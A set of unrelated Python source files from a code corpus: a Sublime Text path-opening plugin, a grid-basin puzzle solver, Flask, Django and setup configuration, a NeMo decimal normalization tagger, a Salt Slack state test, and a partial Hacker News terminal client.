    return {'skills': {'main skill': {'user_defined': payload}}}
def get_trendings(parameters, return_var):
    """Return trending movie titles as one formatted string under *return_var*.

    parameters['periodo'] == 'dia' selects daily trendings, anything else
    selects the weekly list.
    """
    trending_daily = parameters['periodo'] == 'dia'
    titles = movies.get_trendings(trending_daily)
    # Titles are joined here (not in the assistant) because the assistant
    # side offers far less programming power for string handling.
    if titles:
        listing = '\n\n' + ',\n'.join(titles)
    else:
        listing = ''
    return {return_var: listing}
def search_movies(parameters, return_var):
    """Search movies by parameters['termo'] and return the titles formatted.

    The result is a single string stored under *return_var*.
    """
    query = parameters['termo']
    titles = movies.search_movies(query)
    # Titles are joined here (not in the assistant) because the assistant
    # side offers far less programming power for string handling.
    if titles:
        listing = '\n\n' + ',\n'.join(titles)
    else:
        listing = ''
    return {return_var: listing}
|
StarcoderdataPython
|
186332
|
import os.path
import sublime_plugin
import sublime
def get_setting(
    setting,
    default=None,
    window=None,
    settings_file='OpenHighlightedPath.sublime-settings',
    project_settings='open_highlighted_path',
    settings_only=False,
    project_only=False
):
    """Look up *setting*, preferring project data over the plugin settings file.

    Returns *default* when the setting is found in neither source.
    FIXME: Maybe cache the settings, rather than getting them every time.
    """
    if not window:
        window = sublime.active_window()
    # Project-level settings take precedence unless explicitly skipped.
    if not settings_only:
        project_data = window.project_data()
        if project_data and project_settings:
            project_data = project_data.get(project_settings)
        if project_data and setting in project_data:
            return project_data.get(setting)
    # Fall back to the plugin's own settings file.
    if not project_only:
        plugin_settings = sublime.load_settings(settings_file)
        if plugin_settings and plugin_settings.has(setting):
            return plugin_settings.get(setting)
    return default
def find_path_from_others(path, others):
    """Locate *path* relative to ancestor prefixes of the paths in *others*.

    Each entry in *others* is split into components; *path* is appended to
    every cumulative prefix and every combination that exists on disk is
    collected. Returns the list of hits (may contain duplicates).
    """
    if path.startswith('/'):
        path = path[1:]
    hits = []
    for other in others:
        # Split on whichever separator this particular path uses.
        separator = '/' if '/' in other else '\\'
        prefix = '/'
        for piece in other.split(separator):
            prefix = os.path.join(prefix, piece)
            candidate = os.path.join(prefix, path)
            if os.path.exists(candidate):
                hits.append(candidate)
    return hits
class OpenHighlightedPathCommand(sublime_plugin.TextCommand):
    """Open the file path under the cursor (or an explicitly given *path*).

    Candidate locations are gathered from the literal path itself, ancestors
    of other open files, the project's folders, and configured base
    directories. One unique hit opens directly; several show a quick panel.
    """

    def run(self, edit, path=None):
        if path is None:
            # get the current line and the current column
            sel = self.view.sel()
            try:
                region = sel[0]
            except IndexError:
                return
            if region.a == region.b:
                # Empty selection: expand from the caret outwards to the
                # nearest delimiters on the current line.
                point = region.a
                line = self.view.line(point)
                col = self.view.rowcol(point)[1]
                text = self.view.substr(line)
                # Get the path by walking left and right from the current cursor location
                path = ''
                delimiters = get_setting('delimiters', ' "\'')
                if text:
                    # Walk left from point to end of path
                    for i in range(col - 1, -1, -1):
                        character = text[i]
                        if delimiters.find(character) != -1:
                            break
                        path = '%s%s' % (character, path)
                    # Walk right from point to end of path
                    for i in range(col, len(text)):
                        character = text[i]
                        if delimiters.find(character) != -1:
                            break
                        path = '%s%s' % (path, character)
            else:
                # Non-empty selection: use it verbatim.
                path = self.view.substr(region)
        path = path.strip()
        self.hits = []
        if os.path.exists(path) and not get_setting('exclude_literal', False):
            self.hits.append(path)
        # Try to find file based on other open files
        if not get_setting('exclude_current', False):
            others = [x.file_name() for x in self.view.window().views() if x.file_name()]
            self.hits.extend(find_path_from_others(path, others))
        # Try to find file based on the current project
        if not get_setting('exclude_project', False):
            others = []
            for folder in get_setting('folders', [], project_settings=None, project_only=True):
                folder = folder.get('path', '')
                if folder:
                    others.append(folder)
            self.hits.extend(find_path_from_others(path, others))
        # Try to find file based on settings base directories
        self.hits.extend(find_path_from_others(path, get_setting('base_directories', [])))
        # Deduplicate (order is irrelevant — the quick panel shows all hits).
        self.hits = list(set(self.hits))
        if not self.hits:
            sublime.status_message('Could not find file "%s"' % path)
        elif len(self.hits) == 1:
            self.open_file(0)
        else:
            self.view.window().show_quick_panel(
                self.hits,
                self.open_file,
                on_highlight=lambda x: self.open_file(x, sublime.TRANSIENT)
            )

    def open_file(self, selection, flags=0):
        """Open hit number *selection*; -1 means the quick panel was cancelled."""
        if selection != -1:
            self.view.window().open_file(self.hits[selection], flags)
|
StarcoderdataPython
|
3346503
|
import functools
def part1(input_data):
    """Sum the risk levels (height + 1) of all low points in the grid.

    A low point is a cell strictly lower than each of its up/down/left/right
    neighbors; cells on the border simply have fewer neighbors to beat.
    """
    height = len(input_data)
    width = len(input_data[0])

    def is_low_point(j, i):
        value = input_data[j][i]
        for dj, di in ((-1, 0), (1, 0), (0, -1), (0, 1)):
            nj, ni = j + dj, i + di
            if 0 <= nj < height and 0 <= ni < width and input_data[nj][ni] <= value:
                return False
        return True

    return sum(
        input_data[j][i] + 1
        for j in range(height)
        for i in range(width)
        if is_low_point(j, i)
    )
class Cell:
    """One node in the basin graph built by part2.

    Neighbor links are filled in externally; get_size() performs a
    depth-first count of the connected component.
    """

    def __init__(self, value):
        # Height value of this cell.
        self.value = value
        # Adjacent non-wall cells (populated by the caller).
        self.neighbors = []
        # True once a floodfill has counted this cell.
        self.visited = False

    def get_size(self):
        """Return the number of not-yet-visited cells reachable from here.

        Marks every counted cell as visited, so a second call returns 0.
        """
        if self.visited:
            return 0
        self.visited = True
        total = 1
        for neighbor in self.neighbors:
            total += neighbor.get_size()
        return total
def part2(input_data):
    """Multiply the sizes of the three largest basins.

    A basin is a 4-connected region of cells that are not 9. This version
    floodfills iteratively with an explicit stack (instead of building a
    Cell graph and recursing), producing identical basin sizes.
    """
    height = len(input_data)
    width = len(input_data[0])
    seen = [[False] * width for _ in range(height)]
    basin_sizes = []
    for j in range(height):
        for i in range(width):
            if input_data[j][i] == 9 or seen[j][i]:
                continue
            # Floodfill from this seed cell.
            size = 0
            stack = [(j, i)]
            seen[j][i] = True
            while stack:
                cj, ci = stack.pop()
                size += 1
                for nj, ni in ((cj - 1, ci), (cj + 1, ci), (cj, ci - 1), (cj, ci + 1)):
                    if 0 <= nj < height and 0 <= ni < width \
                            and not seen[nj][ni] and input_data[nj][ni] != 9:
                        seen[nj][ni] = True
                        stack.append((nj, ni))
            basin_sizes.append(size)
    # Product of the three largest basin sizes.
    return functools.reduce(lambda a, b: a * b, sorted(basin_sizes)[::-1][:3])
if __name__ == "__main__":
    # Read the puzzle input: one grid row per line, one digit per cell.
    with open("input", "r") as input_file:
        input_data = list(map(lambda x: x.strip(), input_file.readlines()))
    input_data = list(map(lambda x: [int(y) for y in x], input_data))
    print(part1(input_data))
    print(part2(input_data))
|
StarcoderdataPython
|
55679
|
# coding=utf-8
from __future__ import absolute_import, division, print_function, \
unicode_literals
from .manager import *
from .storages import *
|
StarcoderdataPython
|
1691594
|
<filename>prediction/config.py
"""
prediction.config
~~~~~~~~~~~~~~~~~
Provides the flask config options
"""
import os
from os import path
# Glob components matching the nested LIDC-IDRI DICOM directory layout.
LIDC_WILDCARD = ['LIDC-IDRI-*', '**', '**']


class Config(object):
    """Base Flask configuration.

    All paths are derived from the location of this file, so the
    application works regardless of the current working directory.
    """
    # Truthy when the PRODUCTION environment variable is set.
    PROD_SERVER = os.getenv('PRODUCTION', False)
    DEBUG = False

    CURRENT_DIR = path.dirname(path.realpath(__file__))
    PARENT_DIR = path.dirname(CURRENT_DIR)
    ALGOS_DIR = path.abspath(path.join(CURRENT_DIR, 'src', 'algorithms'))
    SEGMENT_ASSETS_DIR = path.abspath(path.join(ALGOS_DIR, 'segment', 'assets'))

    FULL_DICOM_PATHS = path.join(PARENT_DIR, 'images_full')
    SMALL_DICOM_PATHS = path.join(PARENT_DIR, 'images')
    FULL_DICOM_PATHS_WILDCARD = path.join(FULL_DICOM_PATHS, *LIDC_WILDCARD)
    # Bug fix: this previously globbed FULL_DICOM_PATHS (copy-paste error),
    # so the "small" wildcard silently pointed at the full-size images.
    SMALL_DICOM_PATHS_WILDCARD = path.join(SMALL_DICOM_PATHS, *LIDC_WILDCARD)

    DATA_DIR = path.abspath(path.join(CURRENT_DIR, 'data'))
    EXTRACTED_IMAGE_DIR = path.abspath(path.join(CURRENT_DIR, 'extracted'))
class Production(Config):
    """Configuration for production deployments; inherits all defaults."""
    pass
class Development(Config):
    """Configuration for local development: debugging enabled."""
    DEBUG = True
class Test(Config):
    """Configuration for the test suite: debugging enabled."""
    DEBUG = True
|
StarcoderdataPython
|
134360
|
# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pynini
from nemo_text_processing.text_normalization.de.taggers.decimal import get_quantity, quantities
from nemo_text_processing.text_normalization.en.graph_utils import NEMO_SIGMA, GraphFst
from pynini.lib import pynutil
class DecimalFst(GraphFst):
    """
    Finite state transducer for classifying decimal (German inverse text
    normalization), built by inverting the forward (TN) decimal tagger.

    e.g. minus elf komma zwei null null sechs billionen -> decimal { negative: "true" integer_part: "11" fractional_part: "2006" quantity: "billionen" }
    e.g. eine billion -> decimal { integer_part: "1" quantity: "billion" }

    Args:
        itn_cardinal_tagger: ITN Cardinal tagger
        tn_decimal_tagger: TN decimal tagger
        deterministic: forwarded to GraphFst; controls deterministic construction
    """

    def __init__(self, itn_cardinal_tagger: GraphFst, tn_decimal_tagger: GraphFst, deterministic: bool = True):
        super().__init__(name="decimal", kind="classify", deterministic=deterministic)

        # Invert the forward (written->spoken) decimal graph so it maps
        # spoken digit sequences back to written digits.
        self.graph = tn_decimal_tagger.graph.invert().optimize()

        # Remove the spoken decimal separator ("komma").
        delete_point = pynutil.delete(" komma")

        # Rewrite leading "eine " to "eins " before a quantity word so the
        # cardinal graph can consume it (e.g. "eine billion").
        allow_spelling = pynini.cdrewrite(pynini.cross("eine ", "eins ") + quantities, "[BOS]", "[EOS]", NEMO_SIGMA)

        graph_fractional = pynutil.insert("fractional_part: \"") + self.graph + pynutil.insert("\"")
        graph_integer = (
            pynutil.insert("integer_part: \"") + itn_cardinal_tagger.graph_no_exception + pynutil.insert("\"")
        )
        # integer "komma" fractional, keeping the separating space.
        final_graph_wo_sign = graph_integer + delete_point + pynini.accep(" ") + graph_fractional

        # Accept either a plain decimal or a decimal/cardinal followed by a
        # quantity word (billion, billionen, ...).
        self.final_graph_wo_negative = (
            allow_spelling
            @ (
                final_graph_wo_sign
                | get_quantity(
                    final_graph_wo_sign, itn_cardinal_tagger.graph_hundred_component_at_least_one_none_zero_digit
                )
            ).optimize()
        )
        # Optional leading minus, then mark the token to preserve word order.
        final_graph = itn_cardinal_tagger.optional_minus_graph + self.final_graph_wo_negative
        final_graph += pynutil.insert(" preserve_order: true")
        final_graph = self.add_tokens(final_graph)
        self.fst = final_graph.optimize()
|
StarcoderdataPython
|
1651441
|
from django.apps import AppConfig
class TurfsConfig(AppConfig):
    """Django application configuration for the ``turfs`` app."""
    name = 'turfs'
|
StarcoderdataPython
|
1706250
|
<reponame>LyQuid12/Whitehat-CLI<gh_stars>0
from setuptools import setup, find_packages
import re
# The PyPI long description is taken verbatim from the README.
with open('README.md') as f:
    long_description = f.read()
version = ''
# Parse __version__ = '...' out of the package source without importing it
# (importing could fail before dependencies are installed).
with open('wht/__init__.py') as f:
    version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', f.read(), re.MULTILINE).group(1)
if not version:
    raise TypeError('Version is not set')
def read_requirements(path='requirements.txt'):
    """Return the list of requirement strings read from *path*.

    Args:
        path: requirements file to parse.  Defaults to ``requirements.txt``
            so existing callers keep working.

    Returns:
        One stripped requirement string per non-empty line.  Blank lines
        (including the trailing newline most editors add) are dropped; the
        original implementation returned them as empty strings, which
        setuptools rejects in ``install_requires``.
    """
    with open(path, 'r') as req:
        return [line.strip() for line in req if line.strip()]
setup(
name='whitehat-cli',
version=version,
author='LyQuid',
author_email='<EMAIL>',
description = 'CLI Version of Whitehat Packages',
long_description=long_description,
long_description_content_type='text/markdown',
license='Apache License 2.0',
packages=find_packages(),
include_package_data=True,
install_requires=read_requirements(),
entry_points="""
[console_scripts]
wht=wht.cli:cli
""",
)
|
StarcoderdataPython
|
1744412
|
import torch
import argparse
# ----- Parser -----
def parser(argv=None):
    """Build and parse the training-configuration command line.

    Args:
        argv: optional list of argument strings.  ``None`` (the default)
            keeps the original behaviour of reading ``sys.argv[1:]``;
            passing an explicit list makes the function testable.

    Returns:
        argparse.Namespace with all training parameters.  ``device`` is
        resolved to cuda/cpu when not given explicitly.
    """
    PARSER = argparse.ArgumentParser(description='Training parameters.')

    # Dataset
    PARSER.add_argument('--dataset', default='CelebA', type=str,
                        choices=['CIFAR10', 'CelebA', 'Imagenette', 'ImageNet32', 'ImageNet64'],
                        help="Data to be used.")
    PARSER.add_argument('--img_resize', default=64, type=int,
                        help='Change image resolution.')

    # Model
    PARSER.add_argument('--model', default='VAE', type=str,
                        choices=['VAE', 'srVAE'],
                        help="Model to be used.")
    PARSER.add_argument('--network', default='densenet32', type=str,
                        help="Neural Network architecture to be used.")

    # Prior
    PARSER.add_argument('--prior', default='MixtureOfGaussians', type=str,
                        choices=['StandardNormal', 'MixtureOfGaussians', 'RealNVP'],
                        help='Prior type.')
    PARSER.add_argument('--z_dim', default=128, type=int,
                        help='Dimensionality of z latent space.')
    # Help text fixed: this is the u latent space, not z.
    PARSER.add_argument('--u_dim', default=128, type=int,
                        help='Dimensionality of u latent space.')

    # data likelihood
    PARSER.add_argument('--likelihood', default='dmol', type=str,
                        choices=['dmol'],
                        help="Type of likelihood.")
    PARSER.add_argument('--iw_test', default=512, type=int,
                        help="Number of Importance Weighting samples used for approximating the test log-likelihood.")

    # Training Parameters
    PARSER.add_argument('--batch_size', default=64, type=int,
                        help='Batch size.')
    PARSER.add_argument('--epochs', default=50, type=int,
                        help='Number of training epochs.')

    # General Configs
    PARSER.add_argument('--seed', default=141, type=int,
                        help='Fix random seed.')
    PARSER.add_argument('--n_samples', default=8, type=int,
                        help='Number of generated samples.')
    PARSER.add_argument('--log_interval', default=True, type=bool,
                        help='Print progress on every batch.')
    PARSER.add_argument('--device', default=None, type=str,
                        choices=['cpu', 'cuda'],
                        help='Device to run the experiment.')

    # TensorBoard on/off as a paired flag (default: on).
    PARSER.add_argument('--use_tb', dest='use_tb', action='store_true')
    PARSER.add_argument('--no_tb', dest='use_tb', action='store_false')
    PARSER.set_defaults(use_tb=True)

    PARSER.add_argument('--tags', default='logs', type=str,
                        help='Run tags.')

    ARGS = PARSER.parse_args(argv)

    # Check device: fall back to CUDA when available, else CPU.
    if ARGS.device is None:
        ARGS.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")

    return ARGS
# Parsed once at import time so other modules can simply do
# ``from config import args``.
args = parser()

if __name__ == "__main__":
    pass
|
StarcoderdataPython
|
21480
|
<filename>tests/unit/states/test_slack.py
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`<NAME> <<EMAIL>>`
'''
# Import Python libs
from __future__ import absolute_import, unicode_literals, print_function
# Import Salt Testing Libs
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import skipIf, TestCase
from tests.support.mock import (
NO_MOCK,
NO_MOCK_REASON,
MagicMock,
patch
)
# Import Salt Libs
import salt.states.slack as slack
@skipIf(NO_MOCK, NO_MOCK_REASON)
class SlackTestCase(TestCase, LoaderModuleMockMixin):
    '''
    Test cases for salt.states.slack
    '''
    def setup_loader_modules(self):
        # No extra loader globals needed; patch.dict fills __opts__/__salt__ below.
        return {slack: {}}

    # 'post_message' function tests: 1

    def test_post_message(self):
        '''
        Test to send a message to a Slack channel.
        '''
        name = 'slack-message'
        channel = '#general'
        from_name = 'SuperAdmin'
        message = 'This state was executed successfully.'

        # Shared result dict; each branch below updates 'comment'/'result'
        # in place before comparing, so branch order matters.
        ret = {'name': name,
               'changes': {},
               'result': None,
               'comment': ''}

        # test=True: state only reports what it would send.
        with patch.dict(slack.__opts__, {'test': True}):
            comt = ('The following message is to be sent to Slack: {0}'
                    .format(message))
            ret.update({'comment': comt})
            self.assertDictEqual(slack.post_message(name, channel, from_name,
                                                    message), ret)

        # test=False: each missing required argument fails with its own comment.
        with patch.dict(slack.__opts__, {'test': False}):
            comt = ('Slack channel is missing: None')
            ret.update({'comment': comt, 'result': False})
            self.assertDictEqual(slack.post_message(name, None, from_name,
                                                    message), ret)

            comt = ('Slack from name is missing: None')
            ret.update({'comment': comt, 'result': False})
            self.assertDictEqual(slack.post_message(name, channel, None,
                                                    message), ret)

            comt = ('Slack message is missing: None')
            ret.update({'comment': comt, 'result': False})
            self.assertDictEqual(slack.post_message(name, channel, from_name,
                                                    None), ret)

            # Successful send: execution module mocked to return True.
            mock = MagicMock(return_value=True)
            with patch.dict(slack.__salt__, {'slack.post_message': mock}):
                comt = ('Sent message: slack-message')
                ret.update({'comment': comt, 'result': True})
                self.assertDictEqual(slack.post_message(name, channel,
                                                        from_name, message),
                                     ret)
StarcoderdataPython
|
3307219
|
# -*- coding: utf-8 -*-
import sys
import urwid
import subprocess
import threading
from pyhn.popup import Popup
from pyhn.poller import Poller
from pyhn.config import Config, FALSE_WORDS, TRUE_WORDS
from pyhn import __version__
# Detect the interpreter major version once and import urlparse from the
# location that matches it (moved in Python 3 to urllib.parse).
PY3 = sys.version_info.major == 3
if PY3:
    from urllib.parse import urlparse
else:
    from urlparse import urlparse
class ItemWidget(urwid.WidgetWrap):
    """ Widget of listbox, represent each story """
    def __init__(self, story, show_published_time, show_score, show_comments):
        # Copy the story fields onto the widget for cheap access later.
        self.story = story
        self.number = story.number
        # NOTE(review): title is encoded to bytes here, then 'encode("latin")'
        # is attempted on it below — bytes have no .encode() on Python 3, so
        # that call always raises and is silently swallowed.  Verify intent.
        self.title = story.title.encode('utf-8')
        self.url = story.url
        self.domain = urlparse(story.domain).netloc
        self.submitter = story.submitter
        self.submitter_url = story.submitter_url
        self.comment_count = story.comment_count
        self.comments_url = story.comments_url
        self.score = story.score
        self.published_time = story.published_time
        # Column visibility flags from the user's config.
        self.show_published_time = show_published_time
        self.show_score = show_score
        self.show_comments = show_comments

        # Placeholder rendering for stories without a rank number.
        if self.number is None:
            number_text = '-'
            number_align = 'center'
            self.number = '-'
        else:
            number_align = 'right'
            number_text = '%s:' % self.number

        if self.submitter is None:
            self.submitter = None
            self.submitter_url = None
        if self.score is None:
            self.score = "-"
        if self.comment_count is None:
            comment_text = '-'
            self.comment_count = None
            self.comments_url = None
        else:
            comment_text = '%s' % self.comment_count

        title = self.title
        try:
            # See NOTE above: effectively a no-op on Python 3.
            title = title.encode('latin')
        except:
            pass

        # Base columns: rank number + title; optional columns appended below.
        self.item = [
            ('fixed', 4, urwid.Padding(urwid.AttrWrap(
                urwid.Text(number_text, align=number_align),
                'body', 'focus'))),
            urwid.AttrWrap(
                urwid.Text(title), 'body', 'focus'),
        ]
        if self.show_published_time:
            self.item.append(
                ('fixed', 15, urwid.Padding(urwid.AttrWrap(
                    urwid.Text(str(self.published_time), align="right"), 'body', 'focus'))),
            )
        if self.show_score:
            self.item.append(
                ('fixed', 5, urwid.Padding(urwid.AttrWrap(
                    urwid.Text(str(self.score), align="right"), 'body', 'focus'))),
            )
        if self.show_comments:
            self.item.append(
                ('fixed', 8, urwid.Padding(urwid.AttrWrap(
                    urwid.Text(comment_text, align="right"),
                    'body', 'focus')))
            )

        w = urwid.Columns(self.item, focus_column=1, dividechars=1)
        self.__super.__init__(w)

    def selectable(self):
        # Stories must be selectable so the listbox can focus them.
        return True

    def keypress(self, size, key):
        # Key handling is delegated to HNGui.keystroke via the main loop.
        return key
class HNGui(object):
    """ The Pyhn Gui object

    Owns the urwid main loop, the story listbox, header/footer, the help
    popup and a background Poller that refreshes the cache.
    """
    def __init__(self, cache_manager):
        self.cache_manager = cache_manager
        self.already_build = False        # True once build_interface() ran
        self.on_comments = False          # True while the comments view is shown
        self.which = "top"                # current story feed ("top", "newest", ...)

        self.config = Config()
        self.poller = Poller(
            self, delay=int(
                self.config.parser.get('settings', 'refresh_interval')))
        self.palette = self.config.get_palette()
        # NOTE(review): this boolean attribute shadows the show_comments()
        # method defined below — keystroke() later calls
        # self.show_comments(...), which would raise TypeError because the
        # attribute is a bool by then.  Rename one of the two.
        self.show_comments = self.config.parser.get('interface', 'show_comments') in TRUE_WORDS
        self.show_score = self.config.parser.get('interface', 'show_score') in TRUE_WORDS
        self.show_published_time = self.config.parser.get(
            'interface', 'show_published_time') in TRUE_WORDS

    def main(self):
        """
        Main Gui function which create Ui object,
        build interface and run the loop
        """
        self.ui = urwid.raw_display.Screen()
        self.ui.register_palette(self.palette)
        self.build_interface()
        self.ui.run_wrapper(self.run)

    def build_help(self):
        """ Fetch all key bindings and build help message """
        self.bindings = {}
        self.help_msg = []
        self.help_msg.append(
            urwid.AttrWrap(urwid.Text('\n Key bindings \n'), 'title'))
        self.help_msg.append(urwid.AttrWrap(urwid.Text(''), 'help'))
        # One help line per configured binding: "<keys>: <action name>".
        for binding in self.config.parser.items('keybindings'):
            self.bindings[binding[0]] = binding[1]
            line = urwid.AttrWrap(
                urwid.Text(
                    ' %s: %s ' % (binding[1], binding[0].replace('_', ' '))),
                'help')
            self.help_msg.append(line)
        self.help_msg.append(urwid.AttrWrap(
            urwid.Text(' ctrl mouse-left: open story link'), 'help'))
        self.help_msg.append(urwid.AttrWrap(urwid.Text(''), 'help'))
        self.help_msg.append(urwid.AttrWrap(
            urwid.Text(
                ' Thanks for using Pyhn %s! ' % __version__, align='center'),
            'title'))
        self.help_msg.append(urwid.AttrWrap(urwid.Text(''), 'help'))
        self.help_msg.append(
            urwid.AttrWrap(urwid.Text(
                ' Author : toxinu'), 'help'))
        self.help_msg.append(urwid.AttrWrap(
            urwid.Text('  Code   : https://github.com/toxinu/pyhn '),
            'help'))
        self.help_msg.append(urwid.AttrWrap(
            urwid.Text('  Website: http://toxinu.github.io '),
            'help'))
        self.help_msg.append(urwid.AttrWrap(urwid.Text(''), 'help'))
        self.help_msg.append(urwid.AttrWrap(urwid.Text(''), 'help'))
        self.help_msg.append(urwid.AttrWrap(urwid.Text(''), 'help'))

        self.help = Popup(self.help_msg, ('help', 'help'), (0, 1), self.view)

    def build_interface(self):
        """
        Build interface, refresh cache if needed, update stories listbox,
        create header, footer, view and the loop.
        """
        if self.cache_manager.is_outdated():
            self.cache_manager.refresh()

        self.stories = self.cache_manager.get_stories()
        self.update_stories(self.stories)
        # Header columns mirror the optional columns built in ItemWidget.
        self.header_content = [
            ('fixed', 4, urwid.Padding(
                urwid.AttrWrap(urwid.Text(' N°'), 'header'))),
            urwid.AttrWrap(urwid.Text('TOP STORIES', align="center"), 'title'),
        ]
        if self.show_published_time:
            self.header_content.append(
                ('fixed', 15, urwid.Padding(
                    urwid.AttrWrap(urwid.Text('PUBLISHED TIME'), 'header'))),
            )
        if self.show_score:
            self.header_content.append(
                ('fixed', 5, urwid.Padding(
                    urwid.AttrWrap(urwid.Text('SCORE'), 'header'))),
            )
        if self.show_comments:
            self.header_content.append(
                ('fixed', 8, urwid.Padding(
                    urwid.AttrWrap(urwid.Text('COMMENTS'), 'header')))
            )
        self.header = urwid.Columns(self.header_content, dividechars=1)
        self.footer = urwid.AttrMap(
            urwid.Text(
                'Welcome in pyhn by toxinu '
                '(https://github.com/toxinu/pyhn)', align='center'),
            'footer')

        self.view = urwid.Frame(
            urwid.AttrWrap(
                self.listbox, 'body'), header=self.header, footer=self.footer)
        self.loop = urwid.MainLoop(
            self.view,
            self.palette,
            screen=self.ui,
            handle_mouse=True,
            unhandled_input=self.keystroke)

        self.build_help()
        self.already_build = True

    def set_help(self):
        """ Set help msg in footer """
        # NOTE(review): self.help is a Popup instance (set in build_help),
        # not a string — passing it to urwid.Text here looks wrong; confirm.
        self.view.set_footer(
            urwid.AttrWrap(urwid.Text(self.help, align="center"), 'help'))

    def set_footer(self, msg, style="normal"):
        """ Set centered footer message """
        if style == "normal":
            self.footer = urwid.AttrWrap(urwid.Text(msg), 'footer')
            self.view.set_footer(self.footer)
        elif style == "error":
            self.footer = urwid.AttrWrap(urwid.Text(msg), 'footer-error')
            self.view.set_footer(self.footer)

    def set_header(self, msg):
        """ Set header story message """
        self.header_content[1] = urwid.AttrWrap(
            urwid.Text(msg, align="center"), 'title')
        self.view.set_header(urwid.Columns(self.header_content, dividechars=1))

    def keystroke(self, input):
        """ All key bindings are computed here """
        # QUIT
        if input in ('q', 'Q'):
            self.exit(must_raise=True)
        # LINKS
        if input in self.bindings['open_comments_link'].split(','):
            if not self.listbox.get_focus()[0].comments_url:
                self.set_footer('No comments')
            else:
                if not self.on_comments:
                    # NOTE(review): self.show_comments is a bool by now (see
                    # __init__), so this call raises TypeError.
                    self.show_comments(self.listbox.get_focus()[0])
                    self.on_comments = True
                else:
                    self.update_stories(
                        self.cache_manager.get_stories(self.which))
                    self.on_comments = False
                self.open_webbrowser(self.listbox.get_focus()[0].comments_url)
        if input in self.bindings['show_comments_link'].split(','):
            if not self.listbox.get_focus()[0].comments_url:
                self.set_footer('No comments')
            else:
                self.set_footer(self.listbox.get_focus()[0].comments_url)
        if input in self.bindings['open_story_link'].split(','):
            self.open_webbrowser(self.listbox.get_focus()[0].url)
        if input in self.bindings['show_story_link'].split(','):
            self.set_footer(self.listbox.get_focus()[0].url)
        if input in self.bindings['open_submitter_link'].split(','):
            if not self.listbox.get_focus()[0].submitter_url:
                self.set_footer('No submitter')
            else:
                self.open_webbrowser(self.listbox.get_focus()[0].submitter_url)
        if input in self.bindings['show_submitter_link'].split(','):
            if not self.listbox.get_focus()[0].submitter_url:
                self.set_footer('No submitter')
            else:
                self.set_footer(self.listbox.get_focus()[0].submitter_url)
        # MOVEMENTS
        # NOTE(review): 'down' moves to the previous position and 'up' to the
        # next; this may be intentional given list orientation — verify.
        if input in self.bindings['down'].split(','):
            if self.listbox.focus_position - 1 in self.walker.positions():
                self.listbox.set_focus(
                    self.walker.prev_position(self.listbox.focus_position))
        if input in self.bindings['up'].split(','):
            if self.listbox.focus_position + 1 in self.walker.positions():
                self.listbox.set_focus(
                    self.walker.next_position(self.listbox.focus_position))
        if input in self.bindings['page_up'].split(','):
            self.listbox._keypress_page_up(self.ui.get_cols_rows())
        if input in self.bindings['page_down'].split(','):
            self.listbox._keypress_page_down(self.ui.get_cols_rows())
        if input in self.bindings['first_story'].split(','):
            self.listbox.set_focus(self.walker.positions()[0])
        if input in self.bindings['last_story'].split(','):
            self.listbox.set_focus(self.walker.positions()[-1])
        # STORIES
        # Each feed switch runs in a thread so the UI stays responsive.
        if input in self.bindings['newest_stories'].split(','):
            self.set_footer('Syncing newest stories...')
            threading.Thread(
                None,
                self.async_refresher,
                None,
                ('newest', 'NEWEST STORIES'),
                {}).start()
        if input in self.bindings['top_stories'].split(','):
            self.set_footer('Syncing top stories...')
            threading.Thread(
                None, self.async_refresher,
                None, ('top', 'TOP STORIES'), {}).start()
        if input in self.bindings['best_stories'].split(','):
            self.set_footer('Syncing best stories...')
            threading.Thread(
                None, self.async_refresher,
                None, ('best', 'BEST STORIES'), {}).start()
        if input in self.bindings['show_stories'].split(','):
            self.set_footer('Syncing show stories...')
            threading.Thread(
                None, self.async_refresher,
                None, ('show', 'SHOW STORIES'), {}).start()
        if input in self.bindings['show_newest_stories'].split(','):
            self.set_footer('Syncing show newest stories...')
            threading.Thread(
                None,
                self.async_refresher,
                None,
                ('show_newest', 'SHOW NEWEST STORIES'),
                {}).start()
        if input in self.bindings['ask_stories'].split(','):
            self.set_footer('Syncing ask stories...')
            threading.Thread(
                None, self.async_refresher,
                None, ('ask', 'ASK STORIES'), {}).start()
        if input in self.bindings['jobs_stories'].split(','):
            self.set_footer('Syncing jobs stories...')
            threading.Thread(
                None, self.async_refresher,
                None, ('jobs', 'JOBS STORIES'), {}).start()
        # OTHERS
        if input in self.bindings['refresh'].split(','):
            self.set_footer('Refreshing new stories...')
            threading.Thread(
                None, self.async_refresher, None, (), {'force': True}).start()
        if input in self.bindings['reload_config'].split(','):
            self.reload_config()
        if input in ('h', 'H', '?'):
            # Modal help popup: draw it over the screen until a key closes it.
            keys = True
            while True:
                if keys:
                    self.ui.draw_screen(
                        self.ui.get_cols_rows(),
                        self.help.render(self.ui.get_cols_rows(), True))
                    keys = self.ui.get_input()
                    # NOTE(review): `'h' or 'H' or ...` is always truthy, so
                    # this breaks after the first input regardless of the key.
                    # Probably meant: any(k in ('h','H','?','escape') for k in keys).
                    if 'h' or 'H' or '?' or 'escape' in keys:
                        break
        # MOUSE
        # Mouse events arrive as tuples; index 0 is the event name.
        if len(input) > 1 and input[0] == 'ctrl mouse release':
            self.open_webbrowser(self.listbox.get_focus()[0].url)

    def async_refresher(self, which=None, header=None, force=False):
        # Runs in a worker thread: refresh the cache (if stale or forced),
        # swap in the new stories and redraw.
        if which is None:
            which = self.which
        if self.cache_manager.is_outdated(which) or force:
            self.cache_manager.refresh(which)
        stories = self.cache_manager.get_stories(which)
        self.update_stories(stories)
        if header is not None:
            self.set_header(header)
            self.which = which
        self.loop.draw_screen()

    def update_stories(self, stories):
        """ Reload listbox and walker with new stories """
        items = []
        item_ids = []
        for story in stories:
            # Duplicate story ids get a "- " title prefix to mark them.
            if story.id is not None and story.id in item_ids:
                story.title = "- %s" % story.title
                items.append(ItemWidget(
                    story,
                    self.show_published_time,
                    self.show_score,
                    self.show_comments))
            else:
                items.append(ItemWidget(
                    story,
